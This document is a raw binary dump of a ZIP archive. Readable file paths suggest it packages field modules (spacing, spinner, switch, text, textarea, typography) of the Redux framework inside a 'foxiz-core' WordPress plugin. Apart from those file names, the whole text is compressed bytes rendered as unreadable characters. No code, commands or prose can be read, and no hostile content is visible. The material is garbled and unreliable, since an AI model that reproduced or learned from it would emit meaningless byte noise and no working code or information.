3"jکk&VE.˻ܯDSV]]RU[`~70%fOK`I)|^yZj +Qza a7Z4{E}2570V=00pL>q>OĴֳu$,h lgۤLsS{_@IQN==S].՝<(H CQ>hPKYRl] Bfoxiz-core/lib/redux-framework/inc/fields/spacing/field_spacing.jsUMS0W4HNɤn=0Er!ݓ-v{Z2Z0Ej5ibI  R6- !9t31K@]X fP$8&,w &,DI$Gp m5|j5?"pO|lMU7IBtk7z)aIxQ"Ȏ´v *`|Y!tj?gM8[veND3GgU} (b!KH~(soqg.d{#bN9I`S F5CȮ"Jx!r%g9 PQ{>]R\Ry= AI"' z`R'ˀeV%1 ̭Wfk;!`{.gx3UkLj |G_+\ s4{Pkq맾^fZK7̪,U# =Ȫax2hKבX^Al(XO6g:as LzU3Xzzd.ۑsqka׶4t3]u{(Ҋ"(.(LUط^[C: u']cSgdggݔdVYiX=ZK~&\?&W}olԓԦ^~jC=y?PKYR:5LFfoxiz-core/lib/redux-framework/inc/fields/spacing/field_spacing.min.jsn0_%qV".f4|"نCx!DPs|wXy עc3 y{R?WȼK'ΎǮ&ΥU&3~;\WYsㅴ; yK4ӋE#rFs&O.VMjpWd 9*DBʊ[VEH:A 9Bml0>_ PZYt;]G|_Dj fBBSFdyZ$ݤ+j_$pUhP&xTYV>r}PGT; Cw|dJ.>3{TKx@V&qº!`ьMPmòS,tǞCF2t9%$҄ۢC!#0emz@#ʇÂhR o?wELWxү{;_WkpЇnPKYR PLCfoxiz-core/lib/redux-framework/inc/fields/spacing/field_spacing.php\mo_9uæ u+(+%^u;3$eb;=(!gp8|y7_3z23?H=DEt)}!>2`!ٮ =l99}x8n+ _Y4̙0c=͹.X 0Ce C7y\b;8zZ3`qt#D' O|=X JIއ\Ź8̚\, zȖ|^d0].4/"7 ZdbY؊F잗i;ü23fb4A1a1i$!w3,年17s Y (ȳ:czƆQnBFt4yT4Py/fJC6gnHC>My^￁o6~%rӺkiʖ>,0`r*m"MBojJ{&cPʕNMJ= nnbpR+n-w&efr~< 2?1b"5M&RJ2 աsncpt sQ?9DVMw9Z Z8E=9R__`Zh&r>}vrBVd* E%8TiKaJta-^̿JZYK#J%S#`"1K4m3qr4B4t- Tk>Y};3~[BKa6{aä7y785S7Q7F T8:-.iP0h}DDT݃bӰݾUEhiU[Ӂ"`vڢz1` Rz]:?g{̆cJ~Gg/nҋ8WW7w.>wys |O|W[n@_1V6%lվ="^ƀ l#+bV 싔A&*n MopQ[5_w(xd 6F2v}sGA)ɑ/ Įuz>̺А۱-}SxZY9i/|ES[M[OxGIw}yTom[`ҷ87wچS{uJ1g^mjۢ =CqܹFZq"FТRI4B fD5Gn̤?SQUPj7#%ǵ(D U½KUl9S/3jۖSWҘޞV}0 Hnɬsb6c.QCyV:zlAob}ܻFDps<1r9\Tn<bxD̃>K}6/!C -&4ZިԨeq)hYpIVT5q{iTl[)mTu暋4f4.>fNȦP@w?fqYضCy{zsaf>^9mw>*<} YtPop t0k lh11YB֫*=Պ'\HOLv8J.]0]IP)zq!8K9LnqF́l_lଆWο%Z)2EzU@6$, ]q2LltξUJyXӎl8R (- OC=f:b$ۀcx"CGDv2ÃUTe(P=p>'g._H='oѩE Ԡvg~=oS%U4o {h9E$HilVS}kGFTTy]vJMU.̀?^d : p&Ƞs4tKn |F_21 Zhd@oc 241a")es7}czk+ћۄxPqJa7fqF'&rlkn DMUlff,wS^[#:cQy0l}/wALk&L/+m8WtHxX\2Xo ]k-a&yuƽ>b'1UXn_$ 0Lo}vzZ-H\蒞'.݉uFt[lCI^Bˠ?"Cu + 3m^B'ap%\fk\5~HWLdRLS=┻ޜWv؁?dK=oÁHVPސڗ9Rމg=Y5gq藂׾8xIzHAg#o2u,3(q ! .9ѻ+Q{5+7~z%ٴ^-G9Y 9 y1)ZX$I?_3aWK''Nh &~x,/X+ee''ACk)+tۏhW΃ zs3OL+z6su[t)Oطm8=QYԃ_0xB" zP&3IUBL\Oq="LO-M~[ 7^c'$evH Dw-"O$LH@em @ m4{bR tD¾P1 4N@_}Lv  f)*@&o\b6?|e"vF*]9L/d xTmp"FrG)%㶵NlXƮΪH9#T")oΨ.k'Aٖ;RWEhj˙TuqtgRn|Hq[,em4LBO o?vu(P,y\QY:, ʨGdٳ,9~M m("=78BI_.<kٲ"5${j7aU&HWneqlokZ[y &ԶvWz%hTDH``TLP\ Y9?[coc\ϵm߽ˉ/ϓ^>!~t2D[('?i:wd⎫_+x~Y?^o8)M\rWl=Ln!!'2Dq٨!+=@*-1`?>3.ݝ?(3ȏ{k-תG‘?:ӊߧ7GPKYR1Z۔WGfoxiz-core/lib/redux-framework/inc/fields/spinner/field_spinner.css.map_o0SnmXӹnZE]Wѭ5Ux@B~FK|}|VL ,aߴypgx 1=q 9JxSd U2,y8n{IhG}Xaߤ֬pQ)7Zfxa pSb %s\5eę,k@_A1[s5visQNƳ˟C+UǬSU Nmjm)%@>*,hǿ{Ž.;֌15W\ iB%@dA' ;=/ߡU:eX $K8M9Gq[fU9ޤ%çMk?qZW=Ѭ_LYz|>,<|wȥ0K?>ɒ?/1rT^ɦVPKYRiGBfoxiz-core/lib/redux-framework/inc/fields/spinner/field_spinner.jsWMo8Wj˩#e{QX@{XZ-64%(&i @LgKݎU̐ Es|KwdKonmsE+[DnHH4WY2-%x6?H$Z;WFNC)DĠƨfOBD\fC54 'S/퉓owvrhB% {nQMٍ{[ʋE1~'WxF"T+L^u&o&'e<1˨jUR9cScYB aI'oZg KsnH@NBؓۺ1e%- £,֨]E*4Q;=踻$0(|waO]<.QK0zISheAq7T֪nDR`c!ؔ/alba+K,Q}߲1\'f tLH/5Ba -WWqQ`(A(R w3 JF VT<&H0|v@<ܣw8zvC CmBd=`fnJJ򙻣}DWK&p)b(9z) PZ0cϯ726c8b2z˜3:G9{?.g\MwP@sDH|1̴~꙼4"pQ-峾I@g2[$< 9#@Rհ*WRh&c;U?k~Wl7\47- ~ t Jg*_35 ;UfV6N3 O9_d1ۙ}> 6[|{l:Z󩴍d]^(ҟM=G`^U0gjCȔAv>2i]/ڵt2AUwS1{D = я"^`PKYRYIFfoxiz-core/lib/redux-framework/inc/fields/spinner/field_spinner.min.jsTn0 V is= lv,:aY>ʱ'HC`D${yh(Xtk̼HjF/ R_!.p۵]t\ T3Z'm5+ t nAj;u [#OZ$SB(e]6̛yFYBV7г☨X)) &˧ צ >G"H)!TأBJԕY; ̠ GhPwwrUݜNn2W\o8 V5Fkk)N4|_Bs% ?x5EVH!>Cfs2!*}ov`}6}#QuJzg:Mޘ76մc#;%ϡW!<n ym 4.xwo+k\oF^n(R"k??/G4@Ţr}xY^9ƚ}pe@%-OXt"3ŵٰٕ۵LQH v$53K`l!J "Mf>E"/v=ZUM[1D: 1h17q]x_O"g_,i'5J" -D,R;AY˿6b<΁=M AeHЄefXJ/[8\XK=d}iX֩>؞ 6ͤsC[vn4NVG=,ԝ2GY-dtU# ܶSp%nxVRՓx_ Id8dQ7޵ZMQo>%KVIdPؗ'\.;vtHy=V]5U?izۻsXj?Q*0 6*yppԐ`C{r>Ue([Կ2G(wH{-~*bj5}f:([Wxr&S[rU\;5 g7Z2snYcg)束LG]89 <{\Њ bm 3+wlBZvXqY`fq*"? pkυz+@!:*]cdE 1t*Q_ :?sy),atg&\ ;|S Ky^U'GG/ӆj}Qcx@ߟ<˿gS|JE|H:cy1ҍy֦SV ^ QFO{LC(IݼYzfYjIpjԆ|FExߠ F K)n"qyp4ޮ?NZ\5f"ucm'J ((v0yRy ;)w| #eJ." |/QstdYXu131D:[E!$kvINqsZkͱhuBrm~&ZryY&wa:!x'6:2CT{ C!#6xA'~'q<݁w.Xas,r|HLjILhY׷qDƅPʾCF5َI -A ԅ=FJq!r3<n*yƵѯo{kk>xt]v kPg~yt8-=:ktj~_Sɬ dy+Zd  Nj qy(ė$X $܀ Ϗ~|'g'ק/jb(yB}}F}XW8 s1D.%0EτEf ϓ/$ hhTO,=#2y:I`w]QHTY2b]:i\qD._'YV B{> s!Dma! )! '{1wE~)\Ovko9܃Y'"Smo,_WHDkzkMTsRʬ*Ӵ$` 7g$8,[ȪS0nW0UL+;dWb?%EZē);As1TBL rGiؠ|(9ن߀p󔑾T ,yv+Ѩ>ZH: i3/4wwaQ|lCHV1>,Y*V0~ʠj,1ˎA[\AkP::ʈt=iVzͦItsىAGg(+N\XÄ^ݯJb[b}|%O8yRF'ͳݮ^ToXvhMY#a;w=|>^/DA&qx!=:40e_vtǺ d OxC-][@#W.`U[2ei2nG{GpR]hko:;b㝪ܧtBܨA{i}D|g8 mXˠOOl㹶Ƙe}$[E3;vb}cË)ίptO* VmHkHVyg0ꁯcdF! :X{oɷ}dū1 +[ǶoM5_ X"&c06\GC{0ɦ c(Sڅ%*TeRC)PfueT3ץ\nNDУU;^]dm,frMvqjm*2H=O ᇩuy)kJsyɃ:kӅrPDMDUS>Dã7ȵ&d}?A7Lc]f G$~?bO~.=?*z@j1/.lh>ЂW{OV=lhuhC-j;> BVAv6~ka?i|i:V _Fz_߉O Eyb ZvxSVtE ӸW=Dlku Sm@݅Mmn%2XeIOKz)6rj\{UH>X3 LOОkMZk!D 4UHI,]HlP Ė* kxp[,F >!AXI`;TZۓ.6vzVq *e_) |z:?IQ"%Wu.糎k)jWsg]kk~#h9 0jMevw%Rdq7,|ZJ;6+W]>VZZW!2 -LPљ:r{JbpVѪU0=(ґ=wf. pъw3A-> ́yT2^"t%]|KVސ`KΏ99 PKYRp *Nfoxiz-core/lib/redux-framework/inc/fields/spinner/vendor/spinner_custom.min.jsYs6WN!*̅4CI&ˇ̀$(QH-e}A<]@fTd'QţR0G ACmn \  y̪b?f!S/+7tzO&a_Ҍ|3qȖ%/Es_q#2J%($1c_AxWqmJg4szG)ӏ_>N`|6䖖.q8孖c KqNZ%@Ԁ%IY;A,NcX0*xpz',"U"xiŠ)WcJݾn(*N4(#4HXY^WYN%KP3oσ,=:6(bN>Rl FY`VbI_7dȌA+#۹dbf1/bm铡a@ .mcKZ%x)LNKil 륡/!#cbآ10TМ%tRR#7L_ (u#E}dO@qU $÷IƄm=zvdfC!;lLY><AϷi+^V\F0zxfaZ-|o~.[( yzϒ8 E1 th0{^dJ@"TBയKT! !̪a$N[f<  LԞV2^̀Y4{Ʉ`>Zb+bD#E8=o,;pFN( V F,C !e 3|k|gYIAnpV U7=J.9mt UDUr#ou+IMԒ|UdtO1~QO]A8N)K!jYʛ37YHlM0dqx{PxmN@m_Y*X =t)@8|=|nKt팪8d%5롰9|mj 2`9gR/Iѫλ0 }K~|3yZ*]'*f2r`PT(?wRnN(#wm bfU Ց:Sd4fi^hfa\/H7=37uzM:%tR1ydyZB5{&7x0vTk^ T)˗\d2ej5}ڀ'Wb@r ,M;lz i QwGzj}yY8ݎuЂA?,^Uir5lB{{=oYBC9wavuao9<#jj.e=}Oōt7M^g?xfp)_wPФnsMG%ziIn#&}t(o#Xp>!Uz= OOmw"mT;{5wBD:æX4s,=H$D cA_~7^v/['ۜ#Vyyvn짋풶vD [/X +\VhDOϼ>Ƕ!}tph8?{Ӎr7uhi>eI6,u *̛wѼ**{{!F`ȍ=j ^üh@jFycF> lu!Eν(Z 61qp@҄XQkut8ᶑ9XXx@h>V@ԕqW#XR $Q ٽf!m B{L6y&haS}F=lY(!=۞: yqqUӑVk$.zyȁce⊼$G7앧H _!αg C4G,C"h{)/A=nqmIu`'}!LX, U(PNgk`bEi"WN~嶧.2!*~r5PX ZL:շVTI @uWnx&nK+}YmL綍 2$.˙ݏm;k }I 8#mO6Q7C_@+Կ$Z ȏzsN5Fj MW=hWf5P*gf͎&j'@%B/:e«|B^ḑ&tiĬ ɂLdmu{7+=RCDthڪu*\nЀS]ǴFП,JS CĘ(VB~S 6峭Dۂ5ĜkS5=Yl_Tth4?x 8uqe MMA^]ig˦-kACG>('1ˤ6wsD%ԗwy=˳0K`_o(^g$ 5SϮ~UwWoS2%.y+^<PKkT1foxiz-core/lib/redux-framework/inc/fields/switch/PKYR͎2_ Afoxiz-core/lib/redux-framework/inc/fields/switch/field_switch.cssj  }@okȲ4F'a]m&p83ߨ k*yJ -*^OυʖK줜e$@Y-5|d7[yE@J%=0!P]h4eoWp&:-Qꊞ0cY8L}3lzZ8Q)I/Bjs˫d9uĕZ1AD_Eܘ$p?k[[U9V|~&5TBOX/e;GfȊ9<܁+|骎GUVL+^z6j)C26#5 .yW7зϳ&> '.ϣ$?c)po$aU3BaȅNjCrŪ+R KU0ؐ0 UM`&Nڊ4g%9?~1cj3SxC*bl3{XұXN#ֿKD̜ma|# Y`E@0^mk ֌.6ZT!p}:_{Pp?Pܖq"Kd1yv&VqUyOQDyE-kNdvPKYRn>L @foxiz-core/lib/redux-framework/inc/fields/switch/field_switch.jsVMo0W̢Hl8*\9x&m8 a=t.qlL4]ْq/i4Ep$L;Qr@ uw\ q/v~˔AbL>"m''UUApb7շ H*dlD&^G6(vTMUÕ?dGEoB]QmUq<-JP!/ӂo7EC! &m¾M Ɣ3U)+њ]X[  l"v_o3if`Ӈ#vp"IpW2vLIvpLt|0a{ʴ&2K%Q8 ЎA:P]`lPPMo7Y0*߈,TGN [GzmÁpHBjρCx9CjƩ7AgA5Qi͕,Mhi8c:x,/h}tŸL ХBES{rvpNh&H0,g2G^ˎ\р.Us;' E,Q!*ơwAznWs290.clnkLB w]ԖD#gȵׇ㼉}hgB >O W>AHP];((Z$AIVѯNqHgWj&f${Emk&eQ;'SLs{wO1-uU ݡ~ZÚߝí$ x `X XEJ実"$-4e {f 2aiA?U%0sT _nӀL61Sz>o/bJ%Xԍ 3Ź,:4=[ά{ձŨab߷$ZW>|SwbnW6۬J'#6L0bUoPKYRHx6 Afoxiz-core/lib/redux-framework/inc/fields/switch/field_switch.phpVMo8WL jn E[Q8(JRIIɑ,9 &oo>8]-(€H% jPl7 ^THc@>58ɘ1IѤq_+vw0ɶ #pkr*YsnJm aYfP0zS+@ĕԙe-JD[:=#kU21" &MRh!<^^6`a^8>ȝ5#HKu812[Uq} O߂ܬa1n? uM+O rix˯_ ͕[xBFc/jYyvMm2[qeCPK!2EGˏhȋ֖Fc!ͤtlG[p4ozsȅ/l|dIr$ڊT<` i :=aT .L_l?PKYRl~Bfoxiz-core/lib/redux-framework/inc/fields/switch/field_switch.scssTێ }߯ dqӇMנJ@xVm 93iu3),a46 Y~?RY& >*&p (mαj/Bt@c6gjmNLXN) UEeFqrKY(K1r8./vSR&ARSIè-]-/ cod$gtqYL`)lFNOe wyniƫ'B,n6ct>2>c$Ogt6;٥3Zڊ|GyȨe~wN Bz&2:8)r{y-`Ihz 6ϪEqj=fo _Q, ><{}ޜrA~,PKYRH(pCfoxiz-core/lib/redux-framework/inc/fields/switch/slider-control.png}UyPWx1bZ Œl6dž\H(bY%Đl.I@Gh+0i=u-Tk-O*Nk頶(rtAL]{eI k.XbbFzy{CwE #ie*LfFz2Tf@h\{dfT:Uӑf.pf+3"V\g"h 0-<0E橭r"[`# ՃQ@c  9%]{Ch|T: 6qB!s#X/&x0"f4m pp.i3@0|>Ap| ;9jAlF+m$-ggy'S0[5FC6MMPb9q+symMc33)4Ekє6J@"l:fVNs53S6b CjLĀV)$ zL" VU e0"D|dP4n\\ь\Ln#piI2gII+ OFS=<;5)a3 }4EÌ1R%!y2'A(*b>#Q?-WD\!EQD=DIehLhx|10ṳiCt ",LmObyuR^6>~:՗VؚC3e|JumeB+G[5gɇK3kE/U2^8Sgv; Zm) :wZz !mw6a%}q\]Kyo/D_=ysKKtSi= Ѻ/DQՖ.lb5Zp"͎EEEM7sRVA?888"L&QNMRn>;}xx8c-w##{OBXjZo۱cGylEcfTˢz> qrcqg*/S"~"[4rkvS2Ƴg2Io"ﱑnYQ|,99#]K?~Z<?vnoy>% ?>YWi˽=Rgģz=2zll?2%}|2}x# z*kWp~Sz%[QfiW{mm'Ô #===n|VV45,OUbbbߣGЀsxat~pts ._=]@C ۿމ?nhw[jKom,$EW zrv (;ˮ)6<:?B=DT%, QP4NH`Az(TXaC#!"8E2f\‘#YdI%(Q2X2˗0mȔy͛/rl?'C+HXBb&\)(;}],e{s(Q PKYR#LAfoxiz-core/lib/redux-framework/inc/fields/text/field_text.css.mapOK@AОK("HH6?(~ww]fv ć:mٌQ}ټjs@ӥ-%E@D `,O*Ik`m I`ca d_B.nK&e֒K-h-{dpǛb:L6<|Cy2zgcǜ_])6#x;i)|ÙH;Iyc׫)yS% f}?dINsi-MIkKQVKPKYRȡ`^=foxiz-core/lib/redux-framework/inc/fields/text/field_text.phpW_o6 FaoIt@Yނ@`MDJb ;-Y+8yw_>r4 X@*یhq?A)1񷿾}=HܗQCgLʈVqIz-_ )|UmnC "7z95,ߋ\*QŪ >U?+ fYjP29}z=B9F,xfY 95K3/*mvHZfKOᛃ. JB=mA׎ =/ȩR<9Q6tM |^3a*b]fs^8Da)$Z0+Ҵdr*Nӓ5eb\ž5ch.CqHt'!W0l&aႮA{Jvzi8#&3i4rk`<=()%N2pIz`*J}aV(ŀ/ci?Ol13̟*0"p [eMI<ɿ9=_\z#Y)vn Ѫl}"pYeLǸӉn|A-PHHz+APiYu,Ujxj}OF˥1~lp<̧BdHA㩻aOl@ƂzHjdbjtm']7n}HEjQXd:gfN}۩<#ļ@RFHMgKpΌl#8DH F ;7=VwEM8SvΆ#PKYRu^@>foxiz-core/lib/redux-framework/inc/fields/text/field_text.scssRn0 |WdĺUL&1jQu/AeDk>svPTz8zJ4M5QҰ:yy x:U脅x^Q43{^M/jmApi_6֢gl.D~) b7yjg~׬ "H>X79`y /KXKv:lN_ç&kyR`)CyMN6XspLOoӌXv%<"ǵ8 E9ύ~PKkT3foxiz-core/lib/redux-framework/inc/fields/textarea/PKYRX5 Efoxiz-core/lib/redux-framework/inc/fields/textarea/field_textarea.phpVmo6_q5 RŀKdiR4! J:\dQ#$ޒ-vaLK^xQjYz@k|l~Xvо~ż~_IG!#Fi]q,rE,P)U3VL$UZSl'MemkV f rei!G-D[Q#F=lh#LDIyEhԀzYceKf("N;gdc+ʶ@+) ҿXƨ Z#ShT *]',fz߁Zyʹܘa]e[ʏbOGpI 'Qr1n/23a>B5I(IL6#{5^&)˜*u١ݣ, ,DZϳ~ݍnR)Ԧ+r2)i 4Y*5]?p佤sj Ov"B 3F0å(N=9 4IxT>5k[S~(u[` x:۷{& $h"1N'V3 cd 4%X~-+~1qٚ`b>$T7oi-sed@1ϓ[{BcvGrΩs;3Y!ҷd)P1d7-x2fC1vb%L]3\3뭭]fytg Ї4[9 Z&?vͧPKkT5foxiz-core/lib/redux-framework/inc/fields/typography/PKYRv]Ifoxiz-core/lib/redux-framework/inc/fields/typography/field_typography.cssWَ0}FJAԼO*;Ǧي{m Bu w;HQ;[DTȍE~ 3)4PUVЊ%-d4)ʱf{n00#:GI?1OOqq|I SX:0k &YV3}B9#oN%AAws ާ4lkOցbC,{*$tw\z~lKUza:\ɣQ8|% 0[Ғ0> -c$0cB*v,ynrۍ9]k48 tN\~'>$tf9QrSրɿ@S{Dަ52~jv+!$1uK̏^C9B,Ý$_ n)a8(3E c`G}F$_Ӣ180ڍg'!x=aQw}* {a'JZ $ W[u˝h ; ( -C)ܝsH&Qo3iZiLB%|_0Q u|5e:M`иbQoȸx G oPKYR"{ Mfoxiz-core/lib/redux-framework/inc/fields/typography/field_typography.css.mapW]S1}W8QЉLD@>8mYJ.E|L uG7{rݕzTMO6Z6f_3\Eɷ8c@]]>9Sʀ<'cazII);8l$ m xqVcGhL$+"h>q|8W|{r"9\ssd(g=^΃:xjkop`Ή&Ҟp08 yRyZQҷڅ0_q܆ڸNI؜'Y's}@ hk$-!6 ߅NpVn[ۄUJURUTS7t7Wo)v ݛz߅5^bڕ4os3qxfp''Bjh!R"%upXEaƷƊ4-M}EZ$1hAsOl9[eIJ[R?<Χ 2qݔVo~yeNuf)]Yis/2knEvؼh)͇IB$bќ]r+|n&h~p;ïZ%}}.FrV i=3FM{C\%}ĵ)z/PKYR^oHfoxiz-core/lib/redux-framework/inc/fields/typography/field_typography.js=s۶@uRiq^:׸k{Ne24 I)RGRu$AK};Lcb],e_))hlI}ѣ'fɗEY,Y򌈶eJ(_b瓒4Nq4%aӘ\ظfG^ڕ䘬js6z"L27gSUSv{IME~f%s pGN :mUIMc2#aɶ$&Gq"i! /ɹOAA8nw@8ӤdH%Y@"ܦՇMXkIvx-zz/xɴ ~ni2LeJÂa/Q$YR!\t:ټ\蚉A͖,Ȕ|&)ɦ^SvM,I:^vs\Wg7I\txKgh&-k|eo̞ik<F66M9*)9> 9$:?C`/Ӱ,(P$ & hhqO6m]֌i9[$EYy6lqA0'g E6Ȑ\ JTłTa~,aMU `9[g&[g0;G)]mq=H愬l-:Iwƅe Mnqs&]SlmL۲o6@}|L&X& e;KJ1y+)"2=x$"xx?L 6d{@Ua0XEEvdn"!WCM`1 8 Lv5 _bvFKH' 苲[,dؼ-ņ޾ll"<%gha`Ƽm G ?RaJ-3T{6#,{ &i|!Ӿ]S6ՂD۲\-}ٖ+ M̲jܷcT 4S 8,^V?7W{2CtHNʯdQFM# `gN29&\iKU9_I^8Ǩaf; O06︥x96!:mC1~@V) "s  ģonʁvi5))c?l!PW~0O v]XZD訥lyA9?j@.pƻ|[mwE1EpR 0r7iUƴ"Ά[>mFzZWasRm OP5Ot;|ǰ-FۥTA:i;tړqu)S=< |;OZߟ5мK - IvX&=s:1]Jhr;XZ2u/X]ʓ:/ FAi+y< ߏr;,&s?ҏw:a>ƀ;wwK)U|f=o,/c%%Dur?6XQm lH ^Ƞ x~"Rx͞-KLpͤ y3; i$[f3cu1@SDqa9~vBT7SUFŘ1 B n/*ߦ1y 7s"Ew0ԔF9/'h88et&ʊ1: +L0V-+e^/9qsAצ "sD'&e"IRHkx`NHƄCX﫬 ỦON'Oܴn8z90wg tZ'/c4]KٌӓqSL)f{]L} +D4ϯKܑP3Mse1EL_>jFW 9ynZJX]DxUp$QA{uaIb <^|4E[ '`KJқ@& ~><7@ʢ5>Ijn| YG94j!I4H~<<nezv)3HٺJAa\DA~5G6B*kMbwd,sNlE/5> Y!2W9Έ7ra68 K!a8Dy#tSHj\\4c$d=:^(#akUjHlLH6c9:JYTlf팀g5y`3^{6q^q s.lJ-wP3g1/[锡B CU4V(g o:\nbj7:c^((vp$!4ۖ^Kʪr4V؁_;bʐ(Mosm M9X`ʗؖgk7.M h7 :qBn zo (Qp9"W&5^ "?bO PMJg0_<}15D,ȵKZ`\(+TE)8i{F0dm( yR%۶۽qPl5"5g''Xlv%mK{T"yځ#$h\͈/\m5` 쫔Y𶪛:jZ-/&"bߝ4gpfsQK|Q[nh,V[N Ǧ[q1wzsj!0ڬ.{ t7ḇk>zODΑu 0Gj]ihoe7[~c R#S?'f1\Xm@0m;j ǰ#5!|nSallf,3sRy}: aL_ag[ޫieL1x'ZrHƳO8t#G?nhfcb?GQjqK2X:dd9fl}3ńvwĬ';&6a 1e9.'6aNl#0؆"10MYЪJ;3 6֜EO;*wyx9cdJeƒ)9n,q,U@L{vr&ӷۦ~HDPf m"bpQ0!MW7z0Lчz&R䰞 EDlO|a\_/DM4 8Q%4XPnEd>orcYU &G@ҼrW]VǢKd!x"MэĆqL DTM;BsF`/`%ڲDac@ч; >}@k$brEsZ6OqQq[zx(>NG.3򑉒}˫h;'n۩a 9NtWStX(%8pSg>8(vzm&l6^XnaǫH.t;{c]!C4q%֨S>ucMIr VƋ!W?ϗp!6P鑨s(H3u~6%.PKYR<$%Jfoxiz-core/lib/redux-framework/inc/fields/typography/field_typography.json]{w6?]9]4}9QIͣѡ%bL*Iwf -u["`0W՟ | >a(Xؓu:-,eb,͊U4 k14be,@DZB&<mAY@h 2T%M|=g{Nh::BRxͰz4t&l4XGIS/ćS~C?BYb_: V.i(8* =HuUJ{4pp-e4 lY2T'J5K;z2rVF-t IO/QYHIC?|fq3 tlVtͮ!wg!ᭌUTDO1HEJYs>èg]l% +"w]vS1B|9"J֜C"ErU,6Q]6s+t[ z7D#V1`GXT)qw_wmEMc>ա"^b2x~Ne'+E1V7CIF1| _ HUyhNA+L8fnN%?EbbG,{1Y^U£wDe@po-bh$Q(a,%e(T B^i5̣(n)J5 )P^6 f,_eW#bU*Au4#Ĕ4K\_2\IEXb:I^ʪt՝=0땄%e<%hpސ[f seUq&@S"L'!)g]/'R&S|7ajEYGε# LDcs` Ȝ թ:2wśY/:x)h1sW 9)Ǖ3 bǫ6vܢ7];sKfl6Rbl-d.Vc{z@Hc\(\x@HQ0Eכ?sUY*3l@0(ɨMy\;hUP'TA5Іyyzf*wz6iETfi% 1\"{-ox Θ$:#J1vۓ~Jg~R2O"^{t|v&,JIW͐`O8AuDMFD~# V0c ˊL*qQh#kr1}N#ݟ_PU&/"쓨d12W&l %W'ZKPórX@r"aDi{OĞSC͕"$ irVC.f 5ѝSlڙ6XAazdxFɞ0ב3yP7aӸM6H6|grPP%v+#N'F%|z_yh|"<+dd;H;X+UWt"c{ų`[E0φ89u%Kf1#꾡y١),f|fj^b8]?.ٌCio?N|CvYz & j!>C8,|tZ>-o+D%ZQz`Mp]7´#MX$nՖCmQ.bŧqL1'~1$uQ뻁JDRBZLٔ~B 1&n̦`c @mlkJAX5H)Id,lb[oW77jl 8ǯ'?`^@`_7V<9K*vwUҐΌ@>4cZ &T(EBN6MصFZ@ {@nd0*pC|b.`(!gbL;q! CshnL)0lqM[ S[<jl 17if NBu=oiw#Os'NxԂ3XP,p-i*Qghs6yiSi4|4;0E8pz@tbՆMVjP[6l*v3֠]vr x(lxp}p.[FY8>GƘW3Nyr0@C؁,Ռ4ށ,ehYS6}~pc֮Ea ҋ{fF]?|!a_,WY垫mz;5MsYJۇbsd wTޗYW/Tև_zcNIc7~j rorr.z6J^ g2xBm`!)Hަ֒4{UA?+ 4U d#-L;&TrRx\m([OCh@60ot>#m2Ov;hSY ^і20F k6 Je퍈zf Gkn%ux}-|\-ӿ1O+hmP掚ZU5vYi!G ~3o tV'u}  p3'`N!$=BkTyk.y^mmd''>Zge"iv4V5QFī]+^~FY]G!ӡir'LF/v]h8ӨpfJK&,;\tlinjʣ4q Ȇ-N;xuaDam ^uCaLwճ -=O܀67K<4 йqA3 R4MuL 2֔Ղa0mapC&bn}Xs D;ܑhC'p3\ :7\lw ?rh ba _r/tԵP݊; 0zBg՞MA5>A\yU"^(2 0 c4Fn!> \R$(nQGO53*|s`Wj1'vCk75HTEXPGlEAZ+jެp<{e3mFV}4@E `FPm/Ewqi7i#0pBcVh6wC|Ǝpqm0}Ĉ^5=͹hTj#0`C篁VhwCtoOhhR~4#v0$6 /Ѩk IG6 M6+{(n)]SA-GBQgsy ['e5QFauC5K^-SU?~X)]gLӃU<=k{PNc k ˯<[3uUu"p!=$ RIv@H<8[^!c|Y+ C'o[alJ^#?o1WfX0oצ"r6|lq]-v} %!{ľa}˞{^?kvN#_S6e3ٜ;vd)؊rVdW\2*&woGMkjua**I5LM$c uz?>Cj! :6vQ;U*aU[:VU#}0TGǯxۓU}1!aLZ; ؝;2h(Uq4#[$5'vBt{ 4Wc~گ^4)%߽xq$r$˒S<Yg-qׂz}?/ߥ e;q}GxRZ(%LuUcXݣ-#I1 G1TEJs|( e8ND# hܰ 6δX5G)T(+8%$֛q!q!3ݭ/>],Fxh#\5xBu ݜ#J@Vm6&{঩ GG;uor@x2]R(.^. iܧ՚Nؘdf+ܬnFLa }nsvJ&ѻD}l̨9D4as{+үufhùO}L@Wsi͉U{kPk;3 ^lޗ['|1J{GtC_Lj Ps.lTېB`R 0_Sp[VPy0#~q( )DӃ?h@QZcއ.n8(3ϔy lky J{@Ѹ"=#GDnG-eu XM,Q01$_ZꯕC;?mV3r6A0Qj],*Ũf./Lfڒ91x.)cy&/-#L |Vq?͖8Z<EV`T1aӿٕ5ԕv{ vobNxޤH:):-T*6} kn 1EDJ,Kb3),Ȍ`ͶZZnS4:EssUx߂Op2xq<<=g1^_JQ1dAx6}{ ۝I^6mǭjpR칁%gdWP1Ўi%b&IC]R,r_CvX7h\(Dwr$ι:0ߪKkF$.k>Җ LE~Ƨn Wⴿ0uMF?E=d*|N=W,uc ;Pq-*fEP|+Tx--E_S>" NKSՕUQ`k+v' ݏsʚl䪋-z6beM]-MΫoX%ғgXBv"KevńMQIL,B(Obc/1\ew(n[`֒ś~$w R9͈'|-Ŷh^đ"F";$?rltPe~8)>4Z20.RädKͧ)7n| (^.ƿJ93\ؾ' yɁ80 OMw\lf-mrT)Ož^o0pzVά?ׁ~?Rm0m{S"vq @f_s6*ҩgB(u".8_wޞ|E;+ {0Ƚ5,WHѥh]GZ&"TE\Nj51 FVRvUm)(X(1=eX7{i$&dz"oJyCI nӫMx* |/ɢ4aZ԰5D0קi2L>:Ta. #K :O5l2i\ }&ȷQĂZð]li4h;m'e>KflPsB_Aa#*:Y@Si8ҝwWyKP‹/1^%Z#eQYӨV-,TUqOB*m*J!?XL[%k,ʜGbgE6s^@evH{*| D_q@^["CUj!jJ<ūy=~_;KpYU|:}~.q"flR!RzM덙G_̥Rg˹=ַX}BƷZFJ%GH]$g(ҔybB>-d8.P{K9|; g9L#y@m?+:|XU@mZEmZyB9Ү6m]KM mMk zlutWi Fr|x؀ɟ˝#n^ۗ``lzB@h^d *i]:vn}Ao7klЏ;Dyf3V~ j]{Nqߍ1;f!!{e(ԣFA hk)DQo1 Ve?CWqNaa Ƚu1gNb?]h.Ce#Z&ˣ?"jފdj>ou3"Nfv%mLi[%a )\`?JMͳ+0aTRSҞjY*;-ZՠuI5i?Y|OEL%zK=qqh~Ny6޴*sEka©N&zjTri ѯ-8 n*&|_/R)XBױi M|`}Jw)ޘy:c`[iq.y3W/=yE-y{vҴ\Mq=/eeO/ڂ7cgObsgO&μ: tS9?\@!kMZ(>$ba8 8zQ.ZVmzx 